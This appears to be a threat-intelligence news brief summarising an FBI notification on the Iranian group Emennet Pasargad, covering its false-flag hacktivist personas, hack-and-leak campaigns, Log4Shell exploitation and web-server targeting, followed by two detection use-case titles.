Iranian Threat Group Dodges Attributions Through False-Flag Personas
Category: Threat Actor Activity | Industry: N/A | Level: Tactical | Source: FBI
The Federal Bureau of Investigation (FBI) released a private industry notification tracking activity conducted by the Iranian cyber group, Emennet Pasargad. The group used false-flag personas to avoid attribution, thus deflecting their activity onto other hacking groups. Personas taken up by the threat group have included Hackers of Savior disguising themselves as a pro-Palestinian hacktivist group and Desus. Operations initiated by the group have mainly targeted entities in Israel, however the United States has been targeted on multiple occasions including the 2020 Presidential election and an attack against a US organization in the past year. Emennet Pasargad conducts hack-and-leak operations, maximizing the psychological impact of their attacks by broadcasting them to social media channels such as Telegram and online cybercriminals forums, to gain attention to their activity. "The FBI assesses the purpose of these operations is to undermine public confidence in the security of the victim’s network and data, as well as embarrass victim companies and targeted countries. These hack-and-leak campaigns involve a combination of hacking/theft of data and information operations that impact victims via financial losses and reputational damage." The group has a penchant for targeting public-facing applications, especially web servers running PHP code or exposed MySQL databases. At least one US entity was compromised by Emennet Pasargad as the attackers exploited the Log4Shell vulnerability. Along with data theft, the threat actors have defaced websites and even deployed destructive encryption malware.
Anvilogic Use Cases:
- Potential CVE-2021-44228 - Log4Shell
- Potential PHP Webshell